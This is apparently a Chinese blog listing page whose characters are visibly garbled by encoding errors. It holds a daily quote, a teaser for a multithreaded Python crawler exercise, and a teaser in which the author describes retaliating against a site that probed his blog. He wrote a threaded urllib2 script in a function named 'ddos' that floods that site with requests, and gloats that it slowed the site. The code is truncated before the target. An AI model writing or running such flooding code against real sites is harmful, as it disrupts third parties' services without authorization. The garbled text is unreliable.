每日一句 ( 2024920 )  

Years may wrinkle the skin, but to give up enthusiasm wrinkles the soul.

歲月留痕,只及肌膚;激情不再,皺起心靈。———— Samuel Ullman

python函數(shù)式實(shí)現(xiàn)的多線程爬蟲(chóng)練習(xí)

寫(xiě)的一個(gè)爬蟲(chóng)練習(xí),目的是抓取目標(biāo)站點(diǎn)下所有鏈接, 并記錄下問(wèn)題鏈接url(包括問(wèn)題url,入口鏈接,http狀態(tài)碼)。可以自行設(shè)置線程數(shù)量,程序開(kāi)啟一個(gè)子線程來(lái)維護(hù)當(dāng)前線程數(shù)量。之前還好點(diǎn)兒,現(xiàn)在是越改bug越多,問(wèn)題越多。目前發(fā)現(xiàn)的問(wèn)題有:1.線程的管理上,之前用傳統(tǒng)的方法,三個(gè)for循環(huán)來(lái)創(chuàng)建固定數(shù)量線程,不過(guò)發(fā)現(xiàn)如果某線程拋出異常后,線程終止,總線程數(shù)就會(huì)減少。所以自己改成了...

python多線程與urllib2一例

發(fā)現(xiàn)有人居然在試探下載我博客的源碼包,查了那家伙的IP,發(fā)現(xiàn)有一個(gè)網(wǎng)站,所以簡(jiǎn)單寫(xiě)了個(gè)python腳本,利用python的threading與urllib2庫(kù)進(jìn)行瘋狂請(qǐng)求,不知道這算不算是攻擊的一種,反正在運(yùn)行時(shí)它的站倒是挻慢的。。哈哈。。。#coding: gbkimport urllib2import osimport threadingimport timedef ddos(): while True: #我還是把人家地址給匿了吧。。。 req = urllib2.urlopen('ht...